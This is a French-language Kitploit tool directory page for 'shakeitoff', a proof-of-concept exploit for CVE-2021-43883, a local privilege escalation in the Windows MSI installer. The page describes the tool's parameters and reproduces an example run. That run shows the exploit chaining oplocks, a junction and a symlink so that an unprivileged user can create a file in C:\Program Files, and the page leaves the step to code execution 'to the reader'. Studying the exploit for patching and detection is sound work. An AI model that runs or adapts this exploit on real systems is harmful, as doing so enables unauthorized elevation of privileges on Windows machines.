Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
shakeitoff — Élévation de privilèges locale de l'installateur MSI Windows (CVE-2021-43883) | Kitploit
Outils/GitHubGitHub/jbaines-r7/shakeitoff
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationTests d'Intrusion
GitHubjbaines-r7/shakeitoff

shakeitoff

Élévation de privilèges locale de l'installateur MSI Windows (CVE-2021-43883)

Voir le dépôt
7916il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

shakeitoff

Une version plus petite, minimisée et plus propre de InstallerFileTakeOver, c'est-à-dire l'exploit zero-day qui est une « variation » de CVE-2021-41379 (plus tard identifié comme CVE-2021-43883). Cette version n'ouvre pas de shell comme InstallerFileTakeOver. Le but de ce code était de créer une preuve de concept plus simple qui démontre plus fiablement l'attaque par création de fichier. Cette preuve de concept créera le fichier arbitraire demandé par l'utilisateur (et se copiera dedans pour prouver qu'il est accessible en écriture). Démontrer l'exécution de code est un exercice trivial laissé au lecteur.

Pour comprendre comment fonctionne l'attaque, veuillez consulter l'analyse sur AttackerKB.

Utilisation

L'outil nécessite trois paramètres :

root@kitploit:~
C:\Users\albinolobster\source\repos\shakeitoff\x64\Release>.\shakeitoff.exe
option "msi_path" is required
Allowed options:
  -h, --help              produce help message
  -m, --msi_path arg      The path to the MSI to install
  -i, --install_path arg  The path to install to
  -p, --target_path arg   The file to create
  1. -m – le msi à installer (chemin complet requis). Un msi est fourni dans ce dépôt (et vous devriez l'utiliser car les chemins de fichiers comptent).
  2. -i – le chemin d'installation (chemin complet requis). C'est là que le msi est installé / où l'exploit se déroule. L'utilisateur doit le spécifier à l'avance et il doit s'agir d'un répertoire vide. L'outil ne le nettoie pas car cela simplifie la compréhension du bug. Il doit également y avoir un \ final parce que je suis un monstre.
  3. -p – le fichier à écraser/créer. Chemin complet requis.

La PoC se copiera simplement dans le fichier cible.

Exemple d'utilisation

root@kitploit:~
C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

File Not Found

C:\Users\Public>.\shakeitoff.exe -m C:\Users\Public\shakeitoff.msi -i C:\Users\Public\lol\ -p "C:\Program Files\lol"
[+] User provided MSI path: C:\Users\Public\shakeitoff.msi
[+] The target path is: C:\Program Files\lol
[+] Create the temp directory structure we'll install into
[+] Grabbing handle to lock C:\Users\Public\lol\shakeitoff\haters.jpg
[+] Grabbing a directory handle of C:\Users\Public\lol\shakeitoff\
[+] Monitor shakeitoff\shakeitoff for an rbf file
[+] MSI install: ACTION=ADMIN REBOOT=ReallySuppress TARGETDIR=C:\Users\Public\lol\ C:\Users\Public\shakeitoff.msi
[+] Grabbing a handle to inner shakeitoff directory
[+] In callback for oplock one
[+] Opening handle to C:\Users\Public\lol\shakeitoff\8da858.rbf
[+] Creating the callback directory at C:\Users\Public\lol\cb_directory
[+] Grab a handle for the callback directry
[+] Creating a junction from C:\Users\Public\lol\cb_directory to \BaseNamedObjects\Restricted
[+] Inside callback two
[+] Release the hater.jpg handle to unlock
[+] Move the rbf file to C:\Users\Public\lol\weird_directory
[+] Move inner shakeitoff to C:\Users\Public\lol\weird_directory
[+] Move junction at C:\Users\Public\lol\cb_directory to C:\Users\Public\lol\shakeitoff
[+] Configuring symlink from \BaseNamedObjects\Restricted\8da858.rbf to \??\C:\Program Files\lol
[+] symlink created!
[+] MsiInstallProductA return value: 1603
[+] Exploit thread joined
[+] Copy into target!

C:\Users\Public>dir "C:\Program Files\lol"
 Volume in drive C has no label.
 Volume Serial Number is 5E1E-AC13

 Directory of C:\Program Files

12/02/2021  02:01 PM           368,640 lol
               1 File(s)        368,640 bytes
               0 Dir(s)  86,015,610,880 bytes free

Crédits

  • Ce code est influencé par l'exploit original publié par Abdelhamid Naceri (également le découvreur original de la vulnérabilité !).
  • Le code FileOpLock est une version (légèrement modifiée) extraite de angrypolarbearbug2
  • Taylor Swift
Télécharger l’outil